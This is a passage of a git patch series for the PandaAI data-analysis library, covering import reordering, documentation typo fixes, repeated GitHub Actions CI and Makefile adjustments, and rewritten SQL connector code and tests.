from pandasai.agent.agent import Agent
from pandasai.ee.agents.judge_agent import JudgeAgent
-from pandasai_openai import OpenAI
os.environ["PANDASAI_API_KEY"] = "$2a****************************"
diff --git a/examples/security_agent.py b/examples/security_agent.py
index 0e3074db7..192141f33 100644
--- a/examples/security_agent.py
+++ b/examples/security_agent.py
@@ -1,8 +1,9 @@
import os
+from pandasai_openai import OpenAI
+
from pandasai.agent.agent import Agent
from pandasai.ee.agents.advanced_security_agent import AdvancedSecurityAgent
-from pandasai_openai import OpenAI
os.environ["PANDASAI_API_KEY"] = "$2a****************************"
diff --git a/examples/table_relations.py b/examples/table_relations.py
index 726ac8eff..33112ac7e 100644
--- a/examples/table_relations.py
+++ b/examples/table_relations.py
@@ -1,7 +1,8 @@
-from pandasai.agent.base import Agent
+from pandasai_openai import OpenAI
from pandasai_sql.sql import PostgreSQLConnector
+
+from pandasai.agent.base import Agent
from pandasai.ee.connectors.relations import ForeignKey, PrimaryKey
-from pandasai_openai import OpenAI
llm = OpenAI("sk-*************")
From b5e6a589ad5a936960529e197ab9482fd18476bd Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 13:50:25 +0100
Subject: [PATCH 28/58] fix: typos
---
docs/v3/large-language-models.mdx | 36 +++++++++++++++++++++++--------
pandasai/agent/base.py | 2 +-
2 files changed, 28 insertions(+), 10 deletions(-)
diff --git a/docs/v3/large-language-models.mdx b/docs/v3/large-language-models.mdx
index b890aac15..270fd9768 100644
--- a/docs/v3/large-language-models.mdx
+++ b/docs/v3/large-language-models.mdx
@@ -1,13 +1,12 @@
---
-title: 'Set up LLM'
-description: 'Set up Large Language Model in PandaAI'
+title: "Set up LLM"
+description: "Set up Large Language Model in PandaAI"
---
PandaAI supports multiple LLMs.
-To make the library lightweight, the default LLM is BambooLLM, developed by PandaAI team themselves.
+To make the library lightweight, the default LLM is BambooLLM, developed by PandaAI team themselves.
To use other LLMs, you need to install the corresponding llm extension. Once a LLM extension is installed, you can configure it simply using `pai.config.set()`.
-Then, everytime you use the `.chat()` method, it will use the configured LLM.
-
+Then, every time you use the `.chat()` method, it will use the configured LLM.
## BambooLLM
@@ -25,6 +24,7 @@ os.environ["PANDASAI_API_KEY"] = "YOUR_API_KEY"
## OpenAI models
Install the pandasai-openai extension:
+
```bash
# Using poetry
poetry add pandasai-openai
@@ -32,10 +32,12 @@ poetry add pandasai-openai
# Using pip
pip install pandasai-openai
```
+
In order to use OpenAI models, you need to have an OpenAI API key. You can get one here.
Once you have an API key, you can use it to instantiate an OpenAI object:
Configure OpenAI:
+
```python
import pandasai as pai
from pandasai-openai import OpenAI
@@ -45,9 +47,11 @@ llm = OpenAI(api_token="my-openai-api-key")
# Set your OpenAI API key
pai.config.set({"llm": llm})
```
+
### Azure OpenAI models
Install the pandasai-openai extension:
+
```bash
# Using poetry
poetry add pandasai-openai
@@ -60,6 +64,7 @@ In order to use Azure OpenAI models, you need to have an Azure OpenAI API key. Y
Once you have an API key, you can use it to instantiate an Azure OpenAI object:
Configure Azure OpenAI:
+
```python
import pandasai as pai
from pandasai-openai import AzureOpenAI
@@ -71,10 +76,10 @@ llm = AzureOpenAI(api_base="https://.openai.azure.com/",
pai.config.set({"llm": llm})
```
-
## Google models
Install the extension:
+
```bash
# Using poetry
poetry add pandasai-google
@@ -84,6 +89,7 @@ pip install pandasai-google
```
### Google Gemini
+
In order to use Google PaLM models, you need to have a Google Cloud API key. You can get one here.
Once you have an API key, you can use it to instantiate a Google PaLM object:
@@ -97,6 +103,7 @@ pai.config.set({"llm": llm})
```
### Google VertexAI
+
In order to use Google models through Vertexai api, you need to have
Google Cloud Project
@@ -105,6 +112,7 @@ In order to use Google models through Vertexai api, you need to have
Authentication of gcloud
Once you have basic setup, you can use it to instantiate a Google PaLM through vertex ai:
+
```python
import pandasai as pai
from pandasai-google import GoogleVertexAI
@@ -121,8 +129,8 @@ pai.config.set({"llm": llm})
In order to use HuggingFace models via text-generation, you need to first serve a supported large language model (LLM). Read text-generation docs for more on how to setup an inference server.
This can be used, for example, to use models like LLaMa2, CodeLLaMa, etc. You can find more information about text-generation here.
-
Install the extension:
+
```bash
# Using poetry
poetry add pandasai-huggingface
@@ -132,6 +140,7 @@ pip install pandasai-huggingface
```
The inference_server_url is the only required parameter to instantiate an HuggingFaceTextGen model.
+
```python
import pandasai as pai
from pandasai-huggingface import HuggingFaceTextGen
@@ -141,9 +150,10 @@ llm = HuggingFaceTextGen(inference_server_url="http://127.0.0.1:8080")
pai.config.set({"llm": llm})
```
-## LangChain models
+## LangChain models
Install the extension:
+
```bash
# Using poetry
poetry add pandasai-langchain
@@ -153,6 +163,7 @@ pip install pandasai-langchain
```
Configure LangChain:
+
```python
import pandasai as pai
from pandasai-langchain import LangchainLLM
@@ -167,6 +178,7 @@ pai.config.set({"llm": llm })
In order to use Amazon Bedrock models, you need to have an AWS AKSK and gain the model access.
Install the extension:
+
```bash
# Using poetry
poetry add pandasai-bedrock
@@ -176,6 +188,7 @@ pip install pandasai-bedrock
```
Configure AWS Bedrock:
+
```python
import pandasai as pai
from pandasai-bedrock import BedrockClaude
@@ -199,7 +212,9 @@ llm = BedrockClaude(bedrock_runtime_client)
pai.config.set({"llm": llm })
```
+
## IBM models
+
In order to use IBM watsonx.ai models, you need to have
IBM Cloud api key
@@ -209,6 +224,7 @@ In order to use IBM watsonx.ai models, you need to have
The api key can be created in IBM Cloud. The project ID can determined after a Watson Studio service is provisioned in IBM Cloud. The ID can then be found in the project’s Manage tab (Project -> Manage -> General -> Details). The service url depends on the region of the provisioned service instance and can be found here.
Install the extension:
+
```bash
# Using poetry
poetry add pandasai-ibm
@@ -218,6 +234,7 @@ pip install pandasai-ibm
```
Configure IBM Watson:
+
```python
import pandasai as pai
from pandasai-ibm import IBMwatsonx
@@ -242,6 +259,7 @@ poetry add pandasai-local
# Using pip
pip install pandasai-local
```
+
### Ollama
Ollama’s compatibility is experimental (see docs).
@@ -325,4 +343,4 @@ As mentioned in the documentation ([OpenAI Seed](https://platform.openai.com/doc
### Workarounds and Future Updates
For AzureOpenAI Users: Rely on `temperature=0` for reducing randomness. Stay tuned for future updates as we work towards integrating seed functionality with AzureOpenAI.
-For OpenAI Users: Utilize both `temperature=0` and seed for maximum determinism.
\ No newline at end of file
+For OpenAI Users: Utilize both `temperature=0` and seed for maximum determinism.
diff --git a/pandasai/agent/base.py b/pandasai/agent/base.py
index 30f802fe0..401600002 100644
--- a/pandasai/agent/base.py
+++ b/pandasai/agent/base.py
@@ -105,7 +105,7 @@ def __init__(
# Initialize Code Generator
self._code_generator = CodeGenerator(self._state)
- # Initialze Response Generator
+ # Initialize Response Generator
self._response_parser = ResponseParser()
def chat(self, query: str, output_type: Optional[str] = None):
From ffe986c7860e914a95d207d2c17aa6d2d3251703 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 13:56:13 +0100
Subject: [PATCH 29/58] fix ci yml file
---
.github/workflows/ci.yml | 59 ++++++++++++++++++++++------------------
1 file changed, 32 insertions(+), 27 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 3c7ee268c..ddbd72e3a 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -1,4 +1,4 @@
-name: ci
+name: CI
on:
push:
@@ -15,28 +15,31 @@ jobs:
steps:
- uses: actions/checkout@v3
+
- name: Set up Python ${{ matrix.python-version }}
uses: actions/setup-python@v4
with:
python-version: ${{ matrix.python-version }}
- - name: Install Poetry (Unix)
- if: matrix.os != 'windows-latest'
- run: |
- curl -sSL https://install.python-poetry.org | python3 -
- echo 'export PATH="$HOME/.local/bin:$PATH"' >> $GITHUB_ENV
- - name: Install Poetry (Windows)
- if: matrix.os == 'windows-latest'
+
+ - name: Install Poetry
run: |
- (Invoke-WebRequest -Uri https://install.python-poetry.org -UseBasicParsing).Content | python -
- echo "C:\\Users\\runneradmin\\AppData\\Roaming\\Python\\Scripts" >> $env:GITHUB_PATH
+ if [[ "${{ matrix.os }}" == "windows-latest" ]]; then
+ (Invoke-WebRequest -Uri https://install.python-poetry.org -UseBasicParsing).Content | python -
+ echo "C:\\Users\\runneradmin\\AppData\\Roaming\\Python\\Scripts" >> $env:GITHUB_PATH
+ else
+ curl -sSL https://install.python-poetry.org | python3 -
+ echo 'export PATH="$HOME/.local/bin:$PATH"' >> $GITHUB_ENV
+ fi
+
- name: Verify Poetry Installation
run: poetry --version
+
- name: Clear Poetry Cache
run: poetry cache clear pypi --all
- - name: Install future
- run: pip wheel --use-pep517 "future==0.18.3"
+
- name: Install dependencies
run: poetry install --all-extras --with dev --verbose
+
- name: Install extension dependencies
run: |
find extensions/ -mindepth 1 -type d \( \
@@ -51,10 +54,11 @@ jobs:
)
fi
done
+ if: matrix.os != 'windows-latest'
+
- name: Install extension dependencies (Windows)
if: matrix.os == 'windows-latest'
run: |
- # Install LLM extension dependencies
Get-ChildItem -Path extensions/llms -Directory | ForEach-Object {
$projFile = Join-Path $_.FullName "pyproject.toml"
if (Test-Path $projFile) {
@@ -65,7 +69,6 @@ jobs:
}
}
- # Install connector extension dependencies
Get-ChildItem -Path extensions/connectors -Directory | ForEach-Object {
$projFile = Join-Path $_.FullName "pyproject.toml"
if (Test-Path $projFile) {
@@ -76,7 +79,6 @@ jobs:
}
}
- # Install enterprise extension dependencies
Get-ChildItem -Path extensions/ee -Recurse -Directory -Depth 2 | ForEach-Object {
$projFile = Join-Path $_.FullName "pyproject.toml"
if (Test-Path $projFile) {
@@ -86,19 +88,22 @@ jobs:
Pop-Location
}
}
- - name: Lint with ruff
+
+ - name: Run Linting
run: make format_diff
- - name: Spellcheck
+
+ - name: Run Spellcheck
run: make spell_check
- - name: Run core tests
+
+ - name: Run Core Tests
run: make test_core
- - name: Run extension tests
- if: matrix.os != 'windows-latest'
+
+ - name: Run Extension Tests
run: make test_extensions
- - name: Run extension tests (Windows)
- if: matrix.os == 'windows-latest'
+ if: matrix.os != 'windows-latest'
+
+ - name: Run Extension Tests (Windows)
run: |
- # Run LLM extension tests
Get-ChildItem -Path extensions/llms -Directory | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
@@ -109,7 +114,6 @@ jobs:
}
}
- # Run connector extension tests
Get-ChildItem -Path extensions/connectors -Directory | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
@@ -120,7 +124,6 @@ jobs:
}
}
- # Run enterprise extension tests
Get-ChildItem -Path extensions/ee -Recurse -Directory -Depth 2 | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
@@ -130,12 +133,14 @@ jobs:
Pop-Location
}
}
- - name: Run code coverage
+
+ - name: Run Code Coverage
continue-on-error: true
run: |
poetry run coverage run --source=pandasai,extensions -m pytest tests extensions/*/tests extensions/ee/*/tests --ignore=tests/integration_tests
poetry run coverage xml
- - name: Report coverage
+
+ - name: Report Coverage
uses: codecov/codecov-action@v3
with:
token: ${{ secrets.CODECOV_TOKEN }}
From c2d60815b84f11ad530a31b5099672a23289de3f Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 13:59:48 +0100
Subject: [PATCH 30/58] fix: ci
---
.github/workflows/ci.yml | 58 +++++++++++++++++++---------------------
1 file changed, 27 insertions(+), 31 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index ddbd72e3a..90b82fc48 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -1,4 +1,4 @@
-name: CI
+name: ci
on:
push:
@@ -15,31 +15,29 @@ jobs:
steps:
- uses: actions/checkout@v3
-
- name: Set up Python ${{ matrix.python-version }}
uses: actions/setup-python@v4
with:
python-version: ${{ matrix.python-version }}
- - name: Install Poetry
+ - name: Install Poetry (Unix)
+ if: matrix.os != 'windows-latest'
run: |
- if [[ "${{ matrix.os }}" == "windows-latest" ]]; then
- (Invoke-WebRequest -Uri https://install.python-poetry.org -UseBasicParsing).Content | python -
- echo "C:\\Users\\runneradmin\\AppData\\Roaming\\Python\\Scripts" >> $env:GITHUB_PATH
- else
- curl -sSL https://install.python-poetry.org | python3 -
- echo 'export PATH="$HOME/.local/bin:$PATH"' >> $GITHUB_ENV
- fi
-
+ curl -sSL https://install.python-poetry.org | python3 -
+ echo 'export PATH="$HOME/.local/bin:$PATH"' >> $GITHUB_ENV
+ - name: Install Poetry (Windows)
+ if: matrix.os == 'windows-latest'
+ run: |
+ (Invoke-WebRequest -Uri https://install.python-poetry.org -UseBasicParsing).Content | python -
+ echo "C:\\Users\\runneradmin\\AppData\\Roaming\\Python\\Scripts" >> $env:GITHUB_PATH
- name: Verify Poetry Installation
run: poetry --version
-
- name: Clear Poetry Cache
run: poetry cache clear pypi --all
-
+ - name: Install future
+ run: pip wheel --use-pep517 "future==0.18.3"
- name: Install dependencies
run: poetry install --all-extras --with dev --verbose
-
- name: Install extension dependencies
run: |
find extensions/ -mindepth 1 -type d \( \
@@ -54,11 +52,10 @@ jobs:
)
fi
done
- if: matrix.os != 'windows-latest'
-
- name: Install extension dependencies (Windows)
if: matrix.os == 'windows-latest'
run: |
+ # Install LLM extension dependencies
Get-ChildItem -Path extensions/llms -Directory | ForEach-Object {
$projFile = Join-Path $_.FullName "pyproject.toml"
if (Test-Path $projFile) {
@@ -69,6 +66,7 @@ jobs:
}
}
+ # Install connector extension dependencies
Get-ChildItem -Path extensions/connectors -Directory | ForEach-Object {
$projFile = Join-Path $_.FullName "pyproject.toml"
if (Test-Path $projFile) {
@@ -79,6 +77,7 @@ jobs:
}
}
+ # Install enterprise extension dependencies
Get-ChildItem -Path extensions/ee -Recurse -Directory -Depth 2 | ForEach-Object {
$projFile = Join-Path $_.FullName "pyproject.toml"
if (Test-Path $projFile) {
@@ -88,22 +87,19 @@ jobs:
Pop-Location
}
}
-
- - name: Run Linting
+ - name: Lint with ruff
run: make format_diff
-
- - name: Run Spellcheck
+ - name: Spellcheck
run: make spell_check
-
- - name: Run Core Tests
+ - name: Run core tests
run: make test_core
-
- - name: Run Extension Tests
- run: make test_extensions
+ - name: Run extension tests
if: matrix.os != 'windows-latest'
-
- - name: Run Extension Tests (Windows)
+ run: make test_extensions
+ - name: Run extension tests (Windows)
+ if: matrix.os == 'windows-latest'
run: |
+ # Run LLM extension tests
Get-ChildItem -Path extensions/llms -Directory | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
@@ -114,6 +110,7 @@ jobs:
}
}
+ # Run connector extension tests
Get-ChildItem -Path extensions/connectors -Directory | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
@@ -124,6 +121,7 @@ jobs:
}
}
+ # Run enterprise extension tests
Get-ChildItem -Path extensions/ee -Recurse -Directory -Depth 2 | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
@@ -133,14 +131,12 @@ jobs:
Pop-Location
}
}
-
- - name: Run Code Coverage
+ - name: Run code coverage
continue-on-error: true
run: |
poetry run coverage run --source=pandasai,extensions -m pytest tests extensions/*/tests extensions/ee/*/tests --ignore=tests/integration_tests
poetry run coverage xml
-
- - name: Report Coverage
+ - name: Report coverage
uses: codecov/codecov-action@v3
with:
token: ${{ secrets.CODECOV_TOKEN }}
From eb41a18c2abf5b303b80fc459e425929651d9555 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 14:05:03 +0100
Subject: [PATCH 31/58] fix make file for hardcoded env
---
Makefile | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/Makefile b/Makefile
index 7bf6ed49a..3680b4dd3 100644
--- a/Makefile
+++ b/Makefile
@@ -9,9 +9,9 @@ all: help ## default target executed when no arguments are given to make
UNIT_TESTS_DIR ?= tests/unit_tests/
INTEGRATION_TESTS_DIR ?= tests/integration_tests/
-setup_python: ## ensure we're using Python 3.10
- @echo "Setting up Python 3.10..."
- poetry env use python3.10
+# setup_python: ## ensure we're using Python 3.10
+# @echo "Setting up Python 3.10..."
+# poetry env use python3.10
install_deps: setup_python ## install core dependencies
@echo "Installing core dependencies..."
From 1afd565c9b44c3894055e7b92fce3c985aec567d Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 14:07:06 +0100
Subject: [PATCH 32/58] fix make file for hardcoded env
---
Makefile | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/Makefile b/Makefile
index 3680b4dd3..1ba22501c 100644
--- a/Makefile
+++ b/Makefile
@@ -26,7 +26,7 @@ install_extension_deps: setup_python ## install all extension dependencies
@for dir in extensions/llms/*/; do \
if [ -f "$$dir/pyproject.toml" ]; then \
echo "Installing dependencies for $$dir"; \
- cd "$$dir" && poetry env use python3.10 && poetry install --all-extras --with test && cd - || exit 1; \
+ cd "$$dir" && poetry install --all-extras --with test && cd - || exit 1; \
fi \
done
@@ -34,7 +34,7 @@ install_extension_deps: setup_python ## install all extension dependencies
@for dir in extensions/connectors/*/; do \
if [ -f "$$dir/pyproject.toml" ]; then \
echo "Installing dependencies for $$dir"; \
- cd "$$dir" && poetry env use python3.10 && poetry install --all-extras --with test && cd - || exit 1; \
+ cd "$$dir" && poetry install --all-extras --with test && cd - || exit 1; \
fi \
done
@@ -42,7 +42,7 @@ install_extension_deps: setup_python ## install all extension dependencies
@for dir in extensions/ee/*/*/; do \
if [ -f "$$dir/pyproject.toml" ]; then \
echo "Installing dependencies for $$dir"; \
- cd "$$dir" && poetry env use python3.10 && poetry install --all-extras --with test && cd - || exit 1; \
+ cd "$$dir" && poetry install --all-extras --with test && cd - || exit 1; \
fi \
done
From b183fac7c1e3c315291941335c1696792c5e76f0 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 14:16:43 +0100
Subject: [PATCH 33/58] fix make file for hardcoded env
---
.github/workflows/ci.yml | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 90b82fc48..4b41e9aba 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -103,7 +103,7 @@ jobs:
Get-ChildItem -Path extensions/llms -Directory | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
- Write-Host "Running tests for $_"
+ Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
poetry run pytest tests/
Pop-Location
@@ -114,7 +114,7 @@ jobs:
Get-ChildItem -Path extensions/connectors -Directory | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
- Write-Host "Running tests for $_"
+ Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
poetry run pytest tests/
Pop-Location
@@ -125,7 +125,7 @@ jobs:
Get-ChildItem -Path extensions/ee -Recurse -Directory -Depth 2 | ForEach-Object {
$testDir = Join-Path $_.FullName "tests"
if (Test-Path $testDir) {
- Write-Host "Running tests for $_"
+ Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
poetry run pytest tests/
Pop-Location
From eac2c21598168b101b1787efa2527ce2e695f81b Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 14:22:33 +0100
Subject: [PATCH 34/58] fix make file for hardcoded env
---
.github/workflows/ci.yml | 1 +
1 file changed, 1 insertion(+)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 4b41e9aba..368b8f1c0 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -39,6 +39,7 @@ jobs:
- name: Install dependencies
run: poetry install --all-extras --with dev --verbose
- name: Install extension dependencies
+ if: matrix.os != 'windows-latest'
run: |
find extensions/ -mindepth 1 -type d \( \
-path "extensions/llms/*" -o \
From 4d5f54ce53bba121301696fb57dc12eabc45c1cb Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 14:32:14 +0100
Subject: [PATCH 35/58] fix: imports in extensions
---
extensions/llms/google/pandasai_google/google_gemini.py | 2 +-
extensions/llms/google/pandasai_google/google_vertexai.py | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/extensions/llms/google/pandasai_google/google_gemini.py b/extensions/llms/google/pandasai_google/google_gemini.py
index 98c234fbd..76d9d5bed 100644
--- a/extensions/llms/google/pandasai_google/google_gemini.py
+++ b/extensions/llms/google/pandasai_google/google_gemini.py
@@ -2,7 +2,7 @@
from pandasai.exceptions import APIKeyNotFoundError
from pandasai.helpers.memory import Memory
-from pandasai.helpers.optional import import_dependency
+from pandasai.core.code_execution.environment import import_dependency
from .base import BaseGoogle
diff --git a/extensions/llms/google/pandasai_google/google_vertexai.py b/extensions/llms/google/pandasai_google/google_vertexai.py
index 076b9bcf2..33d4c117a 100644
--- a/extensions/llms/google/pandasai_google/google_vertexai.py
+++ b/extensions/llms/google/pandasai_google/google_vertexai.py
@@ -3,7 +3,7 @@
from pandasai.helpers.memory import Memory
from pandasai.exceptions import UnsupportedModelError
-from pandasai.helpers.optional import import_dependency
+from pandasai.core.code_execution.environment import import_dependency
from .base import BaseGoogle
From b2ded792d34a4ab9515ba074f9323fa3711d0110 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 15:53:09 +0100
Subject: [PATCH 36/58] fix(testcases): extension test cases fixed
---
.../connectors/sql/pandasai_sql/__init__.py | 10 +-
extensions/connectors/sql/poetry.lock | 106 ++++-
extensions/connectors/sql/pyproject.toml | 6 +
extensions/connectors/sql/tests/test_sql.py | 442 +++++-------------
.../sql/tests/test_sql_connector.py | 36 --
.../connectors/sql/tests/test_sqlite.py | 113 -----
.../yfinance/pandasai_yfinance/__init__.py | 9 +-
.../pandasai_yfinance/yahoo_finance.py | 199 --------
.../yfinance/tests/test_yahoo_finance.py | 169 ++-----
.../pandasai_databricks/__init__.py | 3 +-
.../databricks/tests/test_databricks.py | 199 +++++---
.../oracle/pandasai_oracle/__init__.py | 3 +-
.../ee/connectors/oracle/tests/test_oracle.py | 295 +++++-------
.../snowflake/pandasai_snowflake/__init__.py | 3 +-
.../snowflake/tests/test_snowflake.py | 352 ++++++--------
.../tests/test_huggingface_text_gen.py | 3 +-
.../langchain/tests/test_langchain_llm.py | 25 +-
extensions/llms/local/tests/test_local_llm.py | 2 +-
extensions/llms/openai/tests/test_openai.py | 3 +-
19 files changed, 689 insertions(+), 1289 deletions(-)
delete mode 100644 extensions/connectors/sql/tests/test_sql_connector.py
delete mode 100644 extensions/connectors/sql/tests/test_sqlite.py
delete mode 100644 extensions/connectors/yfinance/pandasai_yfinance/yahoo_finance.py
diff --git a/extensions/connectors/sql/pandasai_sql/__init__.py b/extensions/connectors/sql/pandasai_sql/__init__.py
index cc9f68f56..15f5362ed 100644
--- a/extensions/connectors/sql/pandasai_sql/__init__.py
+++ b/extensions/connectors/sql/pandasai_sql/__init__.py
@@ -35,9 +35,15 @@ def load_from_sqlite(connection_info, query):
def load_from_cockroachdb(connection_info, query):
- import cockroachdb
+ import psycopg2
- conn = cockroachdb.connect(connection_info)
+ conn = psycopg2.connect(
+ host=connection_info["host"],
+ user=connection_info["user"],
+ password=connection_info["password"],
+ dbname=connection_info["database"],
+ port=connection_info["port"],
+ )
return pd.read_sql(query, conn)
diff --git a/extensions/connectors/sql/poetry.lock b/extensions/connectors/sql/poetry.lock
index 6b73ca6a5..5875c9ad2 100644
--- a/extensions/connectors/sql/poetry.lock
+++ b/extensions/connectors/sql/poetry.lock
@@ -1,4 +1,4 @@
-# This file is automatically @generated by Poetry 1.8.4 and should not be changed by hand.
+# This file is automatically @generated by Poetry 1.8.5 and should not be changed by hand.
[[package]]
name = "annotated-types"
@@ -147,6 +147,17 @@ files = [
{file = "charset_normalizer-3.4.0.tar.gz", hash = "sha256:223217c3d4f82c3ac5e29032b3f1c2eb0fb591b72161f86d93f5719079dae93e"},
]
+[[package]]
+name = "cockroachdb"
+version = "0.3.5"
+description = "CockroachDB adapter for SQLAlchemy"
+optional = false
+python-versions = "*"
+files = [
+ {file = "cockroachdb-0.3.5-py3-none-any.whl", hash = "sha256:b09904b0381386102f6a613173e7b0ffa01addd56606dd4c807601e14fa054d3"},
+ {file = "cockroachdb-0.3.5.tar.gz", hash = "sha256:cc36de86bdf8b56b24c6b556b0eaf20b7dd6e6a1cd73addd31c0ccc4c99639a2"},
+]
+
[[package]]
name = "colorama"
version = "0.4.6"
@@ -1226,6 +1237,82 @@ files = [
dev = ["pre-commit", "tox"]
testing = ["pytest", "pytest-benchmark"]
+[[package]]
+name = "psycopg2-binary"
+version = "2.9.10"
+description = "psycopg2 - Python-PostgreSQL Database Adapter"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "psycopg2-binary-2.9.10.tar.gz", hash = "sha256:4b3df0e6990aa98acda57d983942eff13d824135fe2250e6522edaa782a06de2"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-macosx_12_0_x86_64.whl", hash = "sha256:0ea8e3d0ae83564f2fc554955d327fa081d065c8ca5cc6d2abb643e2c9c1200f"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-macosx_14_0_arm64.whl", hash = "sha256:3e9c76f0ac6f92ecfc79516a8034a544926430f7b080ec5a0537bca389ee0906"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2ad26b467a405c798aaa1458ba09d7e2b6e5f96b1ce0ac15d82fd9f95dc38a92"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:270934a475a0e4b6925b5f804e3809dd5f90f8613621d062848dd82f9cd62007"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:48b338f08d93e7be4ab2b5f1dbe69dc5e9ef07170fe1f86514422076d9c010d0"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7f4152f8f76d2023aac16285576a9ecd2b11a9895373a1f10fd9db54b3ff06b4"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:32581b3020c72d7a421009ee1c6bf4a131ef5f0a968fab2e2de0c9d2bb4577f1"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-musllinux_1_2_i686.whl", hash = "sha256:2ce3e21dc3437b1d960521eca599d57408a695a0d3c26797ea0f72e834c7ffe5"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-musllinux_1_2_ppc64le.whl", hash = "sha256:e984839e75e0b60cfe75e351db53d6db750b00de45644c5d1f7ee5d1f34a1ce5"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:3c4745a90b78e51d9ba06e2088a2fe0c693ae19cc8cb051ccda44e8df8a6eb53"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-win32.whl", hash = "sha256:e5720a5d25e3b99cd0dc5c8a440570469ff82659bb09431c1439b92caf184d3b"},
+ {file = "psycopg2_binary-2.9.10-cp310-cp310-win_amd64.whl", hash = "sha256:3c18f74eb4386bf35e92ab2354a12c17e5eb4d9798e4c0ad3a00783eae7cd9f1"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-macosx_12_0_x86_64.whl", hash = "sha256:04392983d0bb89a8717772a193cfaac58871321e3ec69514e1c4e0d4957b5aff"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-macosx_14_0_arm64.whl", hash = "sha256:1a6784f0ce3fec4edc64e985865c17778514325074adf5ad8f80636cd029ef7c"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b5f86c56eeb91dc3135b3fd8a95dc7ae14c538a2f3ad77a19645cf55bab1799c"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2b3d2491d4d78b6b14f76881905c7a8a8abcf974aad4a8a0b065273a0ed7a2cb"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2286791ececda3a723d1910441c793be44625d86d1a4e79942751197f4d30341"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:512d29bb12608891e349af6a0cccedce51677725a921c07dba6342beaf576f9a"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:5a507320c58903967ef7384355a4da7ff3f28132d679aeb23572753cbf2ec10b"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-musllinux_1_2_i686.whl", hash = "sha256:6d4fa1079cab9018f4d0bd2db307beaa612b0d13ba73b5c6304b9fe2fb441ff7"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-musllinux_1_2_ppc64le.whl", hash = "sha256:851485a42dbb0bdc1edcdabdb8557c09c9655dfa2ca0460ff210522e073e319e"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:35958ec9e46432d9076286dda67942ed6d968b9c3a6a2fd62b48939d1d78bf68"},
+ {file = "psycopg2_binary-2.9.10-cp311-cp311-win32.whl", hash = "sha256:ecced182e935529727401b24d76634a357c71c9275b356efafd8a2a91ec07392"},
